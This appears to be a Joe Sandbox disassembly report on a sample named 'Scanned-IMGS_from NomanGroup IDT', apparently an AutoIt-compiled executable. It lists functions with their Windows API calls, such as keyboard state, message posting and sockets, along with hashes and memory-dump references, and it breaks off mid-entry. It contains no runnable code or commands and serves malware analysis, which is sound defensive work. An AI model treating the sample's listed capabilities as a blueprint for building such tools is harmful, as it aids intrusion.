                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                • String ID:
                                                                                • API String ID: 2829977744-0
                                                                                • Opcode ID: 7951f8e80d9a045ca55be718004cf7d4fa6abd8c31dd7481b734bc3b05f41749
                                                                                • Instruction ID: ff179572fa7dbecb7979b10c93fb9f93be5590665937de9cf3699231f47b5640
                                                                                • Opcode Fuzzy Hash: 7951f8e80d9a045ca55be718004cf7d4fa6abd8c31dd7481b734bc3b05f41749
                                                                                • Instruction Fuzzy Hash: EA91B372E00217AEDF209EA4C881AEF7FA59F45724F19457BE901E7261D729CC41CB68
                                                                                Function 004D4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit
                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                • API String ID: 2610073882-625585964
                                                                                • Opcode ID: c185ee6c8d65a7626b02af4dd1000a1351d2735089f6fad110f283ccd02a8364
                                                                                • Instruction ID: 48a69b9b47e4a3b7415e3a36e2e70ccbd64bfdb3a96e5b15e36355ee4232bba5
                                                                                • Opcode Fuzzy Hash: c185ee6c8d65a7626b02af4dd1000a1351d2735089f6fad110f283ccd02a8364
                                                                                • Instruction Fuzzy Hash: 42918F71A00219ABDF20CFA5C894FAF7BB8AF86714F10855BF505AB380D7789945CBA4
                                                                                Function 004C1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 004C125C
                                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 004C1284
                                                                                • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 004C12A8
                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004C12D8
                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004C135F
                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004C13C4
                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004C1430
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                • String ID:
                                                                                • API String ID: 2550207440-0
                                                                                • Opcode ID: 57a9dbed01e1866e54e8743f654493976bda9158e95fd74ec3f4a1e197b3e390
                                                                                • Instruction ID: 586325a26f35c6a147280973039d49ea115b152cfec208bfb26e2047b68ce6de
                                                                                • Opcode Fuzzy Hash: 57a9dbed01e1866e54e8743f654493976bda9158e95fd74ec3f4a1e197b3e390
                                                                                • Instruction Fuzzy Hash: D591EF799002189FEB449F95C884FBE77B5FF06319F10406FE940EB2A2D778A841CB98
                                                                                Function 0046948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                • String ID:
                                                                                • API String ID: 3225163088-0
                                                                                • Opcode ID: 05269a46f144ce43052e6e2abac0a1242dd3aeef2e121d1ef956691e5f74062e
                                                                                • Instruction ID: 562650173d983a91bc9db61991a1154991fab6adb9792e368f6781b327bb1efb
                                                                                • Opcode Fuzzy Hash: 05269a46f144ce43052e6e2abac0a1242dd3aeef2e121d1ef956691e5f74062e
                                                                                • Instruction Fuzzy Hash: F7911771900219EFCB10CFA9CC84AEEBBB8FF49320F14455AE916B7251D778AD42CB65
                                                                                Function 004D3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 004D396B
                                                                                • CharUpperBuffW.USER32(?,?), ref: 004D3A7A
                                                                                • _wcslen.LIBCMT ref: 004D3A8A
                                                                                • VariantClear.OLEAUT32(?), ref: 004D3C1F
                                                                                  • Part of subcall function 004C0CDF: VariantInit.OLEAUT32(00000000), ref: 004C0D1F
                                                                                  • Part of subcall function 004C0CDF: VariantCopy.OLEAUT32(?,?), ref: 004C0D28
                                                                                  • Part of subcall function 004C0CDF: VariantClear.OLEAUT32(?), ref: 004C0D34
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                • API String ID: 4137639002-1221869570
                                                                                • Opcode ID: 531febb6a6c19910f7fa3214f8b3cda2a8d95ac67594612b378361a774244615
                                                                                • Instruction ID: 47ba52a9314bf38479c40eda85d537ae32bdcd67a2bb8588797d1f66090283de
                                                                                • Opcode Fuzzy Hash: 531febb6a6c19910f7fa3214f8b3cda2a8d95ac67594612b378361a774244615
                                                                                • Instruction Fuzzy Hash: 0E9168746083059FC700DF25C49096AB7E4BF88319F14886FF8899B352DB38EE46CB96
                                                                                Function 004D4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004B000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,004AFF41,80070057,?,?,?,004B035E), ref: 004B002B
                                                                                  • Part of subcall function 004B000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004AFF41,80070057,?,?), ref: 004B0046
                                                                                  • Part of subcall function 004B000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004AFF41,80070057,?,?), ref: 004B0054
                                                                                  • Part of subcall function 004B000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004AFF41,80070057,?), ref: 004B0064
                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 004D4C51
                                                                                • _wcslen.LIBCMT ref: 004D4D59
                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 004D4DCF
                                                                                • CoTaskMemFree.OLE32(?), ref: 004D4DDA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                • String ID: NULL Pointer assignment
                                                                                • API String ID: 614568839-2785691316
                                                                                • Opcode ID: a5f2055d99b77dcf2e7d2a98c66f4f6fcc241041ce203878216db2853b0bd12a
                                                                                • Instruction ID: 7a6676aa555c13771866f63afb482abbf87d61b4efb5c13cbdef68a77ec705c5
                                                                                • Opcode Fuzzy Hash: a5f2055d99b77dcf2e7d2a98c66f4f6fcc241041ce203878216db2853b0bd12a
                                                                                • Instruction Fuzzy Hash: 31912871D0021DEFDF10DFA5C890AEEB7B9BF48304F10856AE915AB241DB389A49CF64
                                                                                Function 004E20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMenu.USER32(?), ref: 004E2183
                                                                                • GetMenuItemCount.USER32(00000000), ref: 004E21B5
                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004E21DD
                                                                                • _wcslen.LIBCMT ref: 004E2213
                                                                                • GetMenuItemID.USER32(?,?), ref: 004E224D
                                                                                • GetSubMenu.USER32(?,?), ref: 004E225B
                                                                                  • Part of subcall function 004B3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 004B3A57
                                                                                  • Part of subcall function 004B3A3D: GetCurrentThreadId.KERNEL32 ref: 004B3A5E
                                                                                  • Part of subcall function 004B3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004B25B3), ref: 004B3A65
                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004E22E3
                                                                                  • Part of subcall function 004BE97B: Sleep.KERNEL32 ref: 004BE9F3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                • String ID:
                                                                                • API String ID: 4196846111-0
                                                                                • Opcode ID: 6c77ece2acb4a4c35b2810f2283b30f4746955d9627753ef2e035cb4d68754f1
                                                                                • Instruction ID: 5f56a10763c89c73615593b72e29c1e6c0d7fb4c32c768bb69c59daf609ce4a5
                                                                                • Opcode Fuzzy Hash: 6c77ece2acb4a4c35b2810f2283b30f4746955d9627753ef2e035cb4d68754f1
                                                                                • Instruction Fuzzy Hash: 0F71B375A00245AFCB00DF66C981AAEB7F5FF48315F1084AAE916EB341D778EE018B95
                                                                                Function 004BAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetParent.USER32(?), ref: 004BAEF9
                                                                                • GetKeyboardState.USER32(?), ref: 004BAF0E
                                                                                • SetKeyboardState.USER32(?), ref: 004BAF6F
                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 004BAF9D
                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 004BAFBC
                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 004BAFFD
                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004BB020
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                • String ID:
                                                                                • API String ID: 87235514-0
                                                                                • Opcode ID: bc80342565f82d0d7363db802c26b6684631747d29752d07e17c08576d89f1e2
                                                                                • Instruction ID: c43da3716c5f47a333bc96891f7851ac5e66d7f226ca5818ad0aeeb8972087b9
                                                                                • Opcode Fuzzy Hash: bc80342565f82d0d7363db802c26b6684631747d29752d07e17c08576d89f1e2
                                                                                • Instruction Fuzzy Hash: 8851C1A06047D53DFB3692348845BFB7EA99B06304F08888AE1D9555C2C3DDEC98D7B9
                                                                                Function 004BACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetParent.USER32(00000000), ref: 004BAD19
                                                                                • GetKeyboardState.USER32(?), ref: 004BAD2E
                                                                                • SetKeyboardState.USER32(?), ref: 004BAD8F
                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 004BADBB
                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 004BADD8
                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 004BAE17
                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 004BAE38
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                • String ID:
                                                                                • API String ID: 87235514-0
                                                                                • Opcode ID: c061fa7c2fb9f4b597f8cdee4fa042353e75bd2618d516a8fda4d15060b87b58
                                                                                • Instruction ID: 9ec0cc14d4ad381965dff80d80ed242b880a5c4778d412b3b08adf7ff8a898ee
                                                                                • Opcode Fuzzy Hash: c061fa7c2fb9f4b597f8cdee4fa042353e75bd2618d516a8fda4d15060b87b58
                                                                                • Instruction Fuzzy Hash: 9451F4A15447D13DFB3783348C95BFB7EA95B46300F08858AE1D5469C2C398ECA8D77A
                                                                                Function 0048542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetConsoleCP.KERNEL32(00493CD6,?,?,?,?,?,?,?,?,00485BA3,?,?,00493CD6,?,?), ref: 00485470
                                                                                • __fassign.LIBCMT ref: 004854EB
                                                                                • __fassign.LIBCMT ref: 00485506
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00493CD6,00000005,00000000,00000000), ref: 0048552C
                                                                                • WriteFile.KERNEL32(?,00493CD6,00000000,00485BA3,00000000,?,?,?,?,?,?,?,?,?,00485BA3,?), ref: 0048554B
                                                                                • WriteFile.KERNEL32(?,?,00000001,00485BA3,00000000,?,?,?,?,?,?,?,?,?,00485BA3,?), ref: 00485584
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                • String ID:
                                                                                • API String ID: 1324828854-0
                                                                                • Opcode ID: b0b7466c5ba3c17daa1ebe08d321de8b947177fb78a7f45f1604b083954182c1
                                                                                • Instruction ID: 33f85f7e4cf9f11f12c8d7c64fa8d5cc9dd0831a540ceb98ecaf436a9a99b58c
                                                                                • Opcode Fuzzy Hash: b0b7466c5ba3c17daa1ebe08d321de8b947177fb78a7f45f1604b083954182c1
                                                                                • Instruction Fuzzy Hash: 1051E5B0A00648AFDB10DFA8D885AEEBBF9EF09300F14455BF955E7292D734DA41CB64
                                                                                Function 004D10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004D304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 004D307A
                                                                                  • Part of subcall function 004D304E: _wcslen.LIBCMT ref: 004D309B
                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004D1112
                                                                                • WSAGetLastError.WSOCK32 ref: 004D1121
                                                                                • WSAGetLastError.WSOCK32 ref: 004D11C9
                                                                                • closesocket.WSOCK32(00000000), ref: 004D11F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 2675159561-0
                                                                                • Opcode ID: e04dc94c97414a1d559cace77acecebecd2f3a12abc08d0a5f602bf1f3fbc85b
                                                                                • Instruction ID: a4e43debbf2f36acd4bdc10f8b82a5a2dfb8309465b1ee57eaa445b2ddf2be29
                                                                                • Opcode Fuzzy Hash: e04dc94c97414a1d559cace77acecebecd2f3a12abc08d0a5f602bf1f3fbc85b
                                                                                • Instruction Fuzzy Hash: F241F531200204AFDB109F54C894BAEB7A9FF45319F14806BFD159B392C778AD45CBA9
                                                                                Function 004BCF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004BDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004BCF22,?), ref: 004BDDFD
                                                                                  • Part of subcall function 004BDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004BCF22,?), ref: 004BDE16
                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 004BCF45
                                                                                • MoveFileW.KERNEL32(?,?), ref: 004BCF7F
                                                                                • _wcslen.LIBCMT ref: 004BD005
                                                                                • _wcslen.LIBCMT ref: 004BD01B
                                                                                • SHFileOperationW.SHELL32(?), ref: 004BD061
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                • String ID: \*.*
                                                                                • API String ID: 3164238972-1173974218
                                                                                • Opcode ID: 538441cc5cc71797d2000710195022cdd63beaa1c6baf8aaa344f06aca10b24b
                                                                                • Instruction ID: 20ee31348a2bf6af39fc85477d40aa910ec0cf1a16116339a08b71eede12356a
                                                                                • Opcode Fuzzy Hash: 538441cc5cc71797d2000710195022cdd63beaa1c6baf8aaa344f06aca10b24b
                                                                                • Instruction Fuzzy Hash: 61416971D052189FDF12EFA5C9C1AEE77B9AF44344F1004EBE509EB142EB38A645CB64
                                                                                Function 004E2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004E2E1C
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 004E2E4F
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 004E2E84
                                                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 004E2EB6
                                                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004E2EE0
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 004E2EF1
                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004E2F0B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow$MessageSend
                                                                                • String ID:
                                                                                • API String ID: 2178440468-0
                                                                                • Opcode ID: 23a5e3c81fd46b578abe96728ab51bb60fdd582fedeed748c2e468be305400a1
                                                                                • Instruction ID: eaa44669fe0efbdf322327006fbb610683b6e346d7b1d02968c9fc016cf907b9
                                                                                • Opcode Fuzzy Hash: 23a5e3c81fd46b578abe96728ab51bb60fdd582fedeed748c2e468be305400a1
                                                                                • Instruction Fuzzy Hash: 193116306042A0AFDB208F1DDDC4F6637E8EB6A711F1401A6F9009F2B2CBB5AC459B49
                                                                                Function 004B7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004B7769
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004B778F
                                                                                • SysAllocString.OLEAUT32(00000000), ref: 004B7792
                                                                                • SysAllocString.OLEAUT32(?), ref: 004B77B0
                                                                                • SysFreeString.OLEAUT32(?), ref: 004B77B9
                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 004B77DE
                                                                                • SysAllocString.OLEAUT32(?), ref: 004B77EC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                • String ID:
                                                                                • API String ID: 3761583154-0
                                                                                • Opcode ID: 2b75ef579b6db35312ab61718e6cc3d76b0af270fa331981b3f58cd1090c2cce
                                                                                • Instruction ID: f021eeb9f77dc4d724afe1b3c37dbe55673707a361766928a8bec79f700fa234
                                                                                • Opcode Fuzzy Hash: 2b75ef579b6db35312ab61718e6cc3d76b0af270fa331981b3f58cd1090c2cce
                                                                                • Instruction Fuzzy Hash: 7321A176604219AFDB10DFA8DCC8CFB77ACEB493647108426B914DB291DA74EC428B78
                                                                                Function 004B77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004B7842
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004B7868
                                                                                • SysAllocString.OLEAUT32(00000000), ref: 004B786B
                                                                                • SysAllocString.OLEAUT32 ref: 004B788C
